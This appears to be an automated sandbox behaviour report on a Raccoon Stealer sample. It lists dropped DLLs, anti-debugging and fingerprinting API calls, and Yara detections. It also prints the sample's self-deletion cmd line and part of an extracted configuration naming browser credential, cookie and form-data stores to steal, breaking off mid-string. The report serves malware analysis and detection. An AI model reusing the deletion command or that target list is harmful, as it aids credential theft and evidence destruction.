Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_004206DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_004206DD

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe TID: 6232	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5684	Thread sleep count: 91 > 30			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_00437819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

1_2_00437819

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

1_2_0043EFDD

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0045C559 IsDebuggerPresent,OutputDebugStringW,

1_2_0045C559

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

1_2_0042A2F9

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_00433882 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree,

1_2_00433882

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0045A03D mov eax, dword ptr fs:[00000030h]	1_2_0045A03D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0045A081 mov eax, dword ptr fs:[00000030h]	1_2_0045A081
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_0045A0B2 mov eax, dword ptr fs:[00000030h]	1_2_0045A0B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00446C01 mov eax, dword ptr fs:[00000030h]	1_2_00446C01

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00446625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00446625
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00440B62 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00440B62
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: 1_2_00440CC5 SetUnhandledExceptionFilter,	1_2_00440CC5

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,	1_2_0042C383
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,	1_2_00437819
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_00462391
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: EnumSystemLocalesW,	1_2_00458577
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,	1_2_0046258C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: EnumSystemLocalesW,	1_2_0046267E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: EnumSystemLocalesW,	1_2_00462633
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: EnumSystemLocalesW,	1_2_00462719
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_004627A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,	1_2_004629F7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_00462B1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,	1_2_00458BA4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetLocaleInfoW,	1_2_00462C23
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00462CF2

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_00440985 cpuid

1_2_00440985

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0043E03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

1_2_0043E03E

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_004371FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,

1_2_004371FA

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

1_2_0042A2F9

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Code function: 1_2_0042C383 __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,

1_2_0042C383

Stealing of Sensitive Information:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User 